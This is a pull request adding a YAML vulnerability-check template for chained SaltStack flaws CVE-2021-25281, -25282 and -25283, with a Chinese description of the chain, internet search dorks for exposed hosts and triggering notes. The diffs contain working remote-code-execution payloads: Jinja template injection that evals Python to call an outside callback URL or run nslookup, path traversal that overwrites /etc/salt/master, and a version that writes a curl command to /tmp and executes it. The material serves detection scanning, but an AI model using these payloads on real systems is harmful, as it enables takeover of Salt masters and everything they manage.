### PR TITLE
saltstack-cve-2021-25283

### DIFF
--- a/pocs/saltstack-cve-2021-25283.yml
+++ b/pocs/saltstack-cve-2021-25283.yml
@@ -4,6 +4,7 @@ set:
   reversedomain: reverse.domain
   reverseurl: reverse.url
   reverseip: reverse.ip
+  rand: randomLowercase(5)
 groups:
   http:
     - method: GET
@@ -16,7 +17,7 @@ groups:
       headers:
         Content-Type: application/json
       body: |
-        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"urllib.request\\\").request.urlopen(\\\"{{reverseurl}}/saltstack/bug\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
+        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"urllib.request\\\").request.urlopen(\\\"{{reverseurl}}/{{rand}}\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
       expression: |
         response.status == 200 && reverse.wait(70)
   dns:

--- a/pocs/saltstack-cve-2021-25283.yml
+++ b/pocs/saltstack-cve-2021-25283.yml
@@ -14,26 +14,22 @@ groups:
         response.status == 200 && response.body.bcontains(b"wheel_async")
     - method: POST
       path: /run
+      follow_redirects: false
       headers:
         Content-Type: application/json
       body: |
-        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"urllib.request\\\").request.urlopen(\\\"{{reverseurl}}/{{rand}}\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
+        [{"client":"wheel_async","fun":"pillar_roots.write","data":"curl {{reverseurl}}{{rand}}","path":"../../../../../../tmp/{{rand}}","token":"132132131213"}]
       expression: |
-        response.status == 200 && reverse.wait(70)
-  dns:
-    - method: GET
-      path: /run
-      follow_redirects: false
-      expression: |
-        response.status == 200 && response.body.bcontains(b"wheel_async")
+        response.status == 200
     - method: POST
       path: /run
       headers:
         Content-Type: application/json
       body: |
-        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"os\\\").system(\\\"nslookup {{reversedomain}} {{reverseip}}\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
+        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"os\\\").system(\\\"chmod 777 /tmp/{{rand}};/tmp/{{rand}}\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
       expression: |
         response.status == 200 && reverse.wait(70)
+
 detail:
   author: kkkbbb(https://github.com/kkkbbb)
   links:

--- a/pocs/saltstack-cve-2021-25283.yml
+++ b/pocs/saltstack-cve-2021-25283.yml
@@ -1,0 +1,39 @@
+name: poc-yaml-saltstack-cve-2021-25283
+set:
+  reverse: newReverse()
+  reversedomain: reverse.domain
+  reverseurl: reverse.url
+  reverseip: reverse.ip
+groups:
+  http:
+    - method: GET
+      path: /run
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.body.bcontains(b"wheel_async")
+    - method: POST
+      path: /run
+      headers:
+        Content-Type: application/json
+      body: |
+        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"urllib.request\\\").request.urlopen(\\\"{{reverseurl}}/saltstack/bug\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
+      expression: |
+        response.status == 200 && reverse.wait(70)
+  dns:
+    - method: GET
+      path: /run
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.body.bcontains(b"wheel_async")
+    - method: POST
+      path: /run
+      headers:
+        Content-Type: application/json
+      body: |
+        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"os\\\").system(\\\"nslookup {{reversedomain}} {{reverseip}}\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
+      expression: |
+        response.status == 200 && reverse.wait(70)
+detail:
+  author: kkkbbb(https://github.com/kkkbbb)
+  links:
+    - https://mp.weixin.qq.com/s/-Kbl0rxxDmx2srceSN_IIA


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
CVE-2021-25281:
salt-api未校验wheel_async客户端的eauth凭据，受此漏洞影响攻击者可远程运行master上任意wheel模块。
CVE-2021-25282:
salt.wheel.pillar_roots.write方法存在目录穿越漏洞。
CVE-2021-25283
内置Jinja渲染引擎存在SSTI（Server Side Template Injection，服务端模板注入）漏洞 

cve-2021-25281 cve-2021-25282 cve-2021-25283多个漏洞组合达到任意命令执行
https://mp.weixin.qq.com/s/-Kbl0rxxDmx2srceSN_IIA
## 测试环境
可以借用vulhub https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md
ZoomEye: "wheel_async"
fofa: body="wheel_async"

![image](https://user-images.githubusercontent.com/18513551/110907279-1cdc0f80-8348-11eb-870b-2a6adaf3f8bd.png)
![image](https://user-images.githubusercontent.com/18513551/110907328-30877600-8348-11eb-80b5-8818003f8a06.png)

##备注
token 为任意随机的16进制
loop_interval在配置文件中可以配置，默认为60s，需要等待60s触发
漏洞触发一次不能修改payload，触发后需要重新启动salt-master